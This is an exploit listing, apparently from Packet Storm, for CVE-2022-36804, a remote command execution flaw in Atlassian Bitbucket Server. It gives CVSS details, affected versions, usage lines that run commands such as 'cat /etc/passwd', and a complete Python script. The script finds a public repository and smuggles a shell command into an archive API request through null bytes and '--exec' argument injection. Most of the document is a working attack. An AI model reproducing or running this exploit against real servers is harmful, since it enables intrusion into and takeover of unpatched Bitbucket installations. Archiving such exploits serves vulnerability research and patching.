Bitbucket 7.0.0 Remote Command Execution

2023-03-2400:00:00

khal4n1

packetstormsecurity.com

137

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

JSON

`# Exploit Title: Bitbucket v7.0.0 - RCE  
# Date: 09-23-2022  
# Exploit Author: khal4n1  
# Vendor Homepage: https://github.com/khal4n1  
# Tested on: Kali and ubuntu LTS 22.04  
# CVE : cve-2022-36804  
  
#****************************************************************#  
#The following exploit is used to exploit a vulnerability present  
#Atlassian Bitbucket Server and Data Center 7.0.0 before version  
#7.6.17, from version 7.7.0 before version 7.17.10, from version  
#7.18.0 before version 7.21.4, from version 8.0.0 before version  
#8.0.3, from version 8.1.0 before version 8.1.3, and from version  
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1  
  
#Usage Example  
  
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'  
  
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'  
  
#The server will send a 500 http response with the stout output from the  
# command executed.  
  
  
#****************************************************************#  
  
#!/usr/bin/python3  
  
import argparse  
import urllib  
from urllib import request  
import re  
  
#argument setup  
parser = argparse.ArgumentParser(description='Program to test  
bitbucket vulnerability CVE-2022-36804')  
parser.add_argument("--url", help="Set the target to attack.  
[REQUIRED]", required=True )  
parser.add_argument("--cmd", help="Set the command to execute.  
[DEFAULT ID]", required=True, default='id')  
args = parser.parse_args()  
cmd= urllib.parse.quote(args.cmd)  
  
  
#reads from the public repository what is available  
requ = request.urlopen(args.url+ "/repos?visibility=public")  
response = requ.read()  
  
#select a public project and stores it in a variable  
project = re.findall('7990/projects/(.*)/repos/',  
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]  
  
#Selects a public repo and stores it in a vatiable  
file = re.findall('/repos/(.*)/browse',  
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]  
  
# Exploitation  
try :  
attack = request.urlopen(args.url +  
"/rest/api/latest/projects/" + project + "/repos/" + file +  
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")  
print (attack.response())  
except urllib.error.HTTPError as e:  
body = e.read().decode() # Read the body of the error response  
print (body)  
  
`